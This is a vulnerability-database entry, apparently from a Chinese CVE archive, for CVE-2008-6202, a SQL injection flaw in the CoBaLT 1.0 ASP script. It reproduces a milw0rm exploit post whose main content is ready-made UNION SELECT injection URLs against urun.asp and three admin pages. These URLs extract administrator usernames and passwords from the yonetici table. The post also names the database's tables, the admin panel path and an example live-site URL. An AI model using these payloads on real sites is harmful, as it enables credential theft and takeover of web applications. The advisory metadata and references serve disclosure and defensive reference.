Jakob-Persson CoBaLT SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1114930 漏洞类型 SQL注入
发布时间 2008-04-05 更新时间 2009-03-05
CVE编号 CVE-2008-6202 CNNVD-ID CNNVD-200902-434
漏洞平台 ASP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/5373
https://www.securityfocus.com/bid/33987
https://cxsecurity.com/issue/WLB-2009020224
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-434
|漏洞详情
CoBaLT1.0版本中存在SQL注入漏洞。远程攻击者可以借助对(1)urun.asp,(2)admin/bayi_listele.asp,(3)admin/urun_grup_listele.asp,和(4)admin/urun_listele.asp的id参数,执行任意SQL指令。
|漏洞EXP
_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

CoBaLT v1.0 Remote SQL Ä°njection Vulnerabiltiy

Discovered : U238

Mail : setuid.noexec0x1@hotmail.com 

WebPage : http://ugur238.org (The End)


Script: http://www.aspindir.com/indir.asp?ID=5414

Script (Alternativ) : http://rapidshare.de/files/39031038/cobaltv.1.zip.html

_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-

Exploit:

http://localhost:2222/lab/cobaltv.1/urun.asp?id=24+union+select+0,1,sifre,3,kadi+from+yonetici

http://localhost:2222/lab/cobaltv.1/admin/bayi_listele.asp?git=duzenle&id=98+union+select+0,1,2,3,sifre,5,kadi,7,8+from+yonetici+where+id=2

----
http://localhost:2222/lab/cobaltv.1/admin/urun_grup_listele.asp?git=duzenle&id=24+union+select+0,kadi+from+yonetici

http://localhost:2222/lab/cobaltv.1/admin/urun_grup_listele.asp?git=duzenle&id=24+union+select+0,sifre+from+yonetici

----

http://localhost:2222/lab/cobaltv.1/admin/urun_listele.asp?id=1+union+select+kadi,sifre,kadi,sifre,sifre+from+yonetici


Admin Panel : localhost/path/admin 

Other Table : bayi - sepet - siparis - siparis_urun - urun - urun_grup - yonetici 


Dork : Sevmem bole seylerı ,  abi anlamıorum ne bos adamlarsınız  :( 


Error Code: 

      id=Request.QueryString("id")
 
      SQL="select * from sepet where id="&"id"


Example Site : http://xxx.org/cobaltv1/urun.asp?id=24+union+select+0,1,sifre,3,kadi+from+yonetici

_-_-_-_-_- NURCÄ°HAN _-_-_-_-_- BU SEVDA BÄ°TMEZ _-_-_-_-_- 4 YIL OLDU Amk

Greatz To : The_BekiR _-_ ka0x _-_ Nettoxic _-_ ZeberuS _-_ Str0ke 

# milw0rm.com [2008-04-05]
|受影响的产品
birol kumru CoBaLT 1.0
|参考资料

来源:XF
名称:cobalt-id-sql-injection(48835)
链接:http://xforce.iss.net/xforce/xfdb/48835
来源:MILW0RM
名称:5373
链接:http://www.milw0rm.com/exploits/5373